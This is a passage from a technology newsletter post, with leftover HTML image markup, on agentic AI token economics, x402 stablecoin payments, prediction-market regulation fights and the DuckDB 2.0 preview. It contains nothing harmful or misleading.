/__u/substackcdn.com/image/fetch/$s_!6nDf!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4fb364e8-669a-4614-aea0-9440a27d9203_1343x554.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!6nDf!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4fb364e8-669a-4614-aea0-9440a27d9203_1343x554.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h6>The extreme variance in ACT here (the 4.33x jump from 4,500 to 19,500 tokens) for the exact same task reflects the gap between models using aggressively compressed reasoning traces and those running unconstrained, multi-path search loops.<br><br></h6><p style="text-align: justify;">None of which makes the extra tokens worthless, per se. A properly harnessed agentic model in the hands of someone who already knows what good looks like is now shipping thirty-six tickets between close of business and the next morning&#8217;s standup, and no hourly rate card was built for that. Lawyerly billable rates start to look quaint by comparison, at least pegged to something resembling effort. So you bill by the token, like everyone else does, because it&#8217;s the only unit left standing. We&#8217;re all in the token factory now (or software factory<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-29" href="#footnote-29" target="_self">29</a> if you prefer) and the factory can&#8217;t tell the ten tokens that solved the problem from the ten thousand spent rediscovering things it already figured out.  Do we just need a better factory?</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!GmM9!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e71b367-6c07-4c15-9f17-8414f34b9c46_940x626.avif" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!GmM9!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e71b367-6c07-4c15-9f17-8414f34b9c46_940x626.avif 424w, /__u/substackcdn.com/image/fetch/$s_!GmM9!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e71b367-6c07-4c15-9f17-8414f34b9c46_940x626.avif 848w, /__u/substackcdn.com/image/fetch/$s_!GmM9!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e71b367-6c07-4c15-9f17-8414f34b9c46_940x626.avif 1272w, /__u/substackcdn.com/image/fetch/$s_!GmM9!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e71b367-6c07-4c15-9f17-8414f34b9c46_940x626.avif 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!GmM9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e71b367-6c07-4c15-9f17-8414f34b9c46_940x626.avif" width="940" height="626" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0e71b367-6c07-4c15-9f17-8414f34b9c46_940x626.avif&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:626,&quot;width&quot;:940,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:28912,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/avif&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/211611094?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e71b367-6c07-4c15-9f17-8414f34b9c46_940x626.avif&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!GmM9!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e71b367-6c07-4c15-9f17-8414f34b9c46_940x626.avif 424w, /__u/substackcdn.com/image/fetch/$s_!GmM9!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e71b367-6c07-4c15-9f17-8414f34b9c46_940x626.avif 848w, /__u/substackcdn.com/image/fetch/$s_!GmM9!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e71b367-6c07-4c15-9f17-8414f34b9c46_940x626.avif 1272w, /__u/substackcdn.com/image/fetch/$s_!GmM9!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e71b367-6c07-4c15-9f17-8414f34b9c46_940x626.avif 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Barron&#8217;s needs better IP protection, apparently.</figcaption></figure></div><h1><strong>You Better You Better You Bet</strong> </h1><blockquote><h5>The answer is no, you don&#8217;t just need a better factory. <br>You need to understand what the factory is actually stamping out.</h5></blockquote><p>Let&#8217;s be honest about what&#8217;s happening; AI wants to eat everything, and crypto is providing the plumbing for how it&#8217;s rewiring the modern world&#8212;and somewhat taking a second seat. (Sorry, frens.) Whatever dreams of total monetary redesign once dominated the space, the action (which is to say capital allocation) has moved elsewhere. Crypto didn&#8217;t disappear tho, it&#8217;s evolved into a silent, specialized utility layer servicing an even more voracious species of software. Stripped of speculative excess, two specific primitives survived the purge to become indispensable to the agentic economy: <strong>stablecoins</strong> as programmable liquidity, and <strong>prediction markets</strong> as probability engines.</p><div class="pullquote"><p>We live under a hilarious, accidental linguistic convergence <br>where the entire technological landscape has collapsed onto a single term: <strong>token</strong>.</p></div><p>When an LLM reasoning loop plans a task, it consumes a <strong>string token</strong>, a fragment of text scored by a probability matrix. <span>When that same agent needs to cross an HTTP boundary to buy more inference or trigger a tool via </span><code>x402</code><span>, it pays with a </span><strong><span>cryptographic token</span></strong><span>, a balance-state on a programmatic settlement rail.</span> <span>And when that agent needs to hedge the execution risk of its own multi-step task or query external reality, it buys an </span><strong><span>event token</span></strong><span> on a prediction market, a binary derivative priced between zero and one that acts as a real-world probability index.</span></p><p>The symmetry is almost too poetic. At its core, an LLM is a token-predicting machine; a system that ingests context and computes the probability distribution of the next sequence. Prediction markets are literally so-named because they are prognostication aggregators; externalizing the exact same probabilistic gesture across human and machine financial consensus. When autonomous agents need to evaluate real-world uncertainty, price execution risk, or hedge a task outcome, they don&#8217;t consult static logic; they query a live order book. Token prediction on the inside; prediction aggregation on the outside. </p><p>Neither mechanism needs to know the story behind the number; in each case the number itself is the story. A model doesn't need to know why a logit has the probability it has; it just does the math and calculates the next result. A prediction market doesn't need to know why need to know why a Kalshi contract is sitting at 63&#162;, it just takes that price as an input to its next update. It doesn&#8217;t need to know why a trader holds a particular thesis; the thesis disappears into the price, and the price is what settles the trade. This, then is their structural kinship, and also what distinguishes both from a benchmark. </p><p>A benchmark operates under a different temporal regime: post hoc (or <em>post rem gestam</em>); not during, but after. A benchmark exists <em>after</em> the run, a static score recorded once execution terminates. A prediction market operates <em>during</em> the run, an inline signal the agent queries mid-task to decide what happens next. One grades what has happened; the other steers what is happening.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-30" href="#footnote-30" target="_self">30</a> </p><p>And this is also the differentiation we see where the model meets everything wrapped around it, in the loops and the harnesses and the evolving ecosystem where we have been &#8220;sitting with the question&#8221; as to whether recursive self-improvement is compounding or merely accumulating. The model layer is commoditizing as open weights close the capability gap fast enough that whatever lead a frontier model established in the previous iteration gets absorbed into the wider ecosystem before the next generation arrives. When the model itself stops being a <em>durable</em> advantage, the harness wrapped around it, what model it calls, how long it lets that model think, what it's willing to pay for the answer, becomes the thing that's actually doing the work. And this is what is now becoming <s>legible</s> across the entire stack:</p><ul><li><p>Model weights are accumulating along predictable power laws, but the harnesses, quantization stacks, and execution loops wrapped around them are fiercely compounding.</p></li><li><p>Software development is shifting from human-paced craftsmanship to machine-paced cascades, pushing physical data centers and platforms like GitHub to structural failure.</p></li><li><p>Monetized token APIs attempt to tax this momentum through billable verbosity, but open-weight ecosystems and dynamic orchestration harnesses are engineering ways to route around the meter entirely.</p></li><li><p>And at the top of the stack, an automated financial rail, anchored by GENIUS Act stablecoins, wired through x402, and priced by prediction markets, gives those machine loops a native currency to trade the very volatility they create.</p></li></ul><pre><code><code>                              AGENTIC FINANCE 
                    
   &#9484;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9488;   [1] Legitimizes    &#9484;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9488;
   &#9474; Federal Legalization &#9474; &#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&gt; &#9474; Unmetered Liquidity  &#9474;
   &#9474;  of Payment Stable-  &#9474;   Institutional      &#9474; (USDC, Treasury-     &#9474;
   &#9474;   coins (GENIUS Act) &#9474;     Capital          &#9474;    backed rails)     &#9474;
   &#9492;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9496;                      &#9492;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9496;
              &#9474;                                             &#9474;
              &#9474;                                             &#9474; [2] Provides Programmable
              &#9474; [4] Accelerates Jurisdictional              &#9474;     Settlement Capital 
              &#9474;     Friction (NY Lawsuit vs.                &#9474;     via x402 Protocol
              &#9474;     CFTC/Kalshi/Polymarket)                 &#9660;
              &#9660;                                  &#9484;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9488;
   &#9484;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9488;                      &#9474; Micro-Settlement for &#9474;
   &#9474; Real-Time Volatility &#9474; &lt;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472; &#9474; Autonomous Machine   &#9474;
   &#9474;  Prediction Markets  &#9474;   [3] Prices Risk &amp;  |   Agents             &#9474;
   &#9474; (Kalshi, Polymarket) &#9474;       Hedges Task    &#9492;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9496;
   &#9492;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9496;       Outcomes
</code></code></pre><ol><li><p><strong>Legitimizes Institutional Capital:</strong> <span>The implementation of the </span><strong><span>GENIUS Act</span></strong><span> (Guiding and Establishing National Innovation for U.S. Stablecoins) and Treasury/OCC rulemaking gave institutional capital the explicit regulatory green light to mint, hold, and deploy reserve-backed payment stablecoins at scale.</span></p></li><li><p><strong>Provides Programmable Settlement Capital via x402 Protocol:</strong> <span>Yield-bearing stablecoin reserves feed directly into autonomous machine wallets using </span><strong><span>x402</span></strong><span>&#8212;the open HTTP-native payment standard governed under the Linux Foundation.</span> <span>Agents negotiate, authorize, and settle API calls, inference-time compute, and micro-tasks inline via </span><code>HTTP 402 Payment Required</code><span> headers without human intervention or credit cards.</span></p></li><li><p><strong>Prices Risk &amp; Hedges Task Outcomes:</strong> Equipped with x402 payment rails, autonomous agent loops interact directly with prediction exchanges (Kalshi, Polymarket). Agents place micro-wagers to hedge execution success, price latency volatility, and pull external market probability distributions back into their internal reasoning chains.</p></li><li><p><strong>Accelerates Jurisdictional Friction:</strong> The explosion of real-time, agent-accessible event derivatives triggered aggressive pushback&#8212;exemplified by New York State&#8217;s legal campaign against Kalshi and Polymarket over unlicensed gambling allegations. It is a classic turf war: state-level gaming regulators attempting to enforce geographic boundaries on an unmetered, programmatic settlement layer.</p></li></ol><div><hr></div><p>The Treasury issued its proposed rule on payment stablecoin issuance last Monday (August 17th). FinCEN and OFAC followed two days later with the anti-money-laundering requirements behind it; whatever happens to the rest of crypto, the dollar token survived long enough to become boring plumbing, exactly what the machine economy needed. x402 now counts Anthropic, Google, Stripe, and Visa among its members; an agent sends a signed payload, pays in USDC, and retries the request in the same round trip. Kalshi and Polymarket cleared more than $50 billion in combined monthly volume this summer, more than every legal U.S. sportsbook combined, and it&#8217;s (&#8216;quietly&#8217;) moving from crypto edgelords to TradFi: more than a quarter of Wall Street interns surveyed by Morgan Stanley said they&#8217;d used a prediction-market app in the past year. Which naturally invites attention. New York sued Kalshi on July 31st for $36 billion; the CFTC answered within days, issuing an emergency directive ordering Kalshi to keep operating on federal preemption grounds, asserting exclusive federal jurisdiction over the same contracts a Manhattan federal judge had already let New York regulate. A dozen other states are running some version of the same fight. No one is confused about what a prediction market is; they&#8217;re fighting over who gets to say so, and the answer decides whether tens of billions a month gets taxed as gambling or supervised as a federal financial instrument.</p><blockquote><p>The point of x402 is not that AI agents need crypto because crypto is fashionable.</p></blockquote><p>This regulatory collision stems directly from a structural shift in software design. Regulators attempt to enforce static, post-hoc legal categories on an infrastructure that operates as a dynamic, continuous feedback loop. The financial stack splits along the exact same functional line as the execution layer powering it. A model&#8217;s parameters accumulate a static quantity, scored after the fact, the same way a benchmark is. The harness and routing layer wrapped around it compounds instead: dynamic, live, updating with every call the same way a market updates with every trade. The split isn&#8217;t really about speed. (Sorry, Virilio.) <strong>Accumulation is iterative</strong>: run, record the result, run again; the pile gets bigger, but the last run is never an <em>integral</em>  part of the machinery producing the next one. <strong>Compounding requires participation</strong>: the output of one round enters the mechanism that generates the next round, so the system&#8217;s history becomes part of its own operating state, not just a ledger of what it&#8217;s done. A benchmark score can pile up forever without ever touching the run that produced it. A market price gets used in the very decision it&#8217;s pricing. A token gets billed like a metered utility, so the harness gets trained to produce tokens, not to ask whether fewer of them would have served you better. An agent gets a funded wallet and a payment rail before anyone&#8217;s perfected the sandbox it&#8217;s supposed to stay inside. Every one of them split the same way: one half accumulates, the other participates.</p><p>If prediction markets were just benchmarks, nobody would be suing them. The legal and financial war happened this summer precisely because agents got funded wallets and started using live order books as runtime inputs during execution. New York&#8217;s suit targets the bet itself. The GENIUS Act regulates the rail underneath it. This summer autonomous agents got funded wallets at the exact moment prediction markets became large enough to move policy, while all the lawyers currently suing each other over jurisdiction argue whether an agent with money and no human in the loop is a feature of this stack or a bug, and machine go brrr.</p><p>All of which leaves us with a macroeconomic apparatus that looks less like a tech stack and more like a self-referential perpetual motion engine that insists it respects the laws of physics. The frontier labs burn billions in compute to accumulate static weights; the open-weight ecosystem strips those weights for parts, wraps them in zero-marginal-cost local harnesses, and unleashes autonomous agents to trade prediction derivatives against the latency of their own API calls. It&#8217;s tokens all the way down, a highly improbable probabilistic unified infrastructure running on unmetered local harnesses and state-level regulatory friction. The string token predicts the text, the cryptographic token settles the compute, and the event token hedges real time odds whether the whole loop compounds or collapses before the standup call tomorrow morning which has now accumulated more agents than humans on it. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!lZPI!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4e5d038-f779-476e-b665-3611f3b17f03_1176x896.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!lZPI!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4e5d038-f779-476e-b665-3611f3b17f03_1176x896.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!lZPI!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4e5d038-f779-476e-b665-3611f3b17f03_1176x896.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!lZPI!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4e5d038-f779-476e-b665-3611f3b17f03_1176x896.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!lZPI!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4e5d038-f779-476e-b665-3611f3b17f03_1176x896.jpeg 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!lZPI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4e5d038-f779-476e-b665-3611f3b17f03_1176x896.jpeg" width="727" height="553.9047619047619" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e4e5d038-f779-476e-b665-3611f3b17f03_1176x896.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:false,&quot;imageSize&quot;:&quot;normal&quot;,&quot;height&quot;:896,&quot;width&quot;:1176,&quot;resizeWidth&quot;:727,&quot;bytes&quot;:669305,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/211611094?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4e5d038-f779-476e-b665-3611f3b17f03_1176x896.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:&quot;center&quot;,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!lZPI!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4e5d038-f779-476e-b665-3611f3b17f03_1176x896.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!lZPI!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4e5d038-f779-476e-b665-3611f3b17f03_1176x896.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!lZPI!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4e5d038-f779-476e-b665-3611f3b17f03_1176x896.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!lZPI!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4e5d038-f779-476e-b665-3611f3b17f03_1176x896.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">My what a lovely spatula.</figcaption></figure></div><h2><code>One More Thing&#8230;</code></h2><blockquote><h5><em>&#8220;A major version bump is not something we do lightly or just for ceremony&#8230;&#8221;</em></h5></blockquote><p>DuckDB dropped its <a href="https://duckdb.org/2026/08/17/duckdb-20-highlights">preview of v2.0</a> on Aug 17, codename Cyanoptera, after the cinnamon teal (Spatula cyanoptera), a reddish-brown duck found in the western Americas, and the joke I made about DuckLake being &#8220;something to quack about&#8221; a year ago is now the literal name of the protocol. The big thing team MotherDuck is quacking about is that its a genuine architecture shift, not a version-number vanity bump: DuckDB (the single-client, in-process database) gets a client/server mode, and the <code>quack</code> extension graduates from preview to stable, giving you a native <code>CONNECT</code> statement that either talks to another DuckDB over the wire or pushes SQL straight down into Postgres/MySQL, no more pulling tables over the network first. There&#8217;s also a genuinely new SQL parser (they finally ditched the Postgres-derived one), triggers with transition tables, a new default storage format, and a recursive CTE engine that&#8217;s 40x faster on their own benchmark. Async I/O finally decouples the query engine from S3/object-store latency, and (extension authors, this one's for you) a stable, versioned C API, so you can stop recompiling your extension for every point release. M&#252;hleisen's framed it as "the year of DuckDB as a server." but longtime DuckDB users will welcome it as the End of Local/Remote Dualism.</p><p>We are entering an era where the artificial dichotomy between &#8220;embedded local engine&#8221; and &#8220;distributed cloud warehouse&#8221; is collapsing into a single continuum. <span>When an in-process columnar database can handle graph-recursive CTEs 40x faster, push similarity vector joins (</span><code>NEAREST</code><span>) into local pipeline execution, and saturate cloud backplanes over async sockets (without blowing out memory bounds) the threshold for spinning up heavy, expensive analytical clusters gets pushed back significantly. At the risk of sounding like their marketing dept is paying me off, </span>whether you&#8217;re embedding high-throughput log evaluation inside edge agents or rethinking your data lakehouse egress costs, DuckDB 2.0 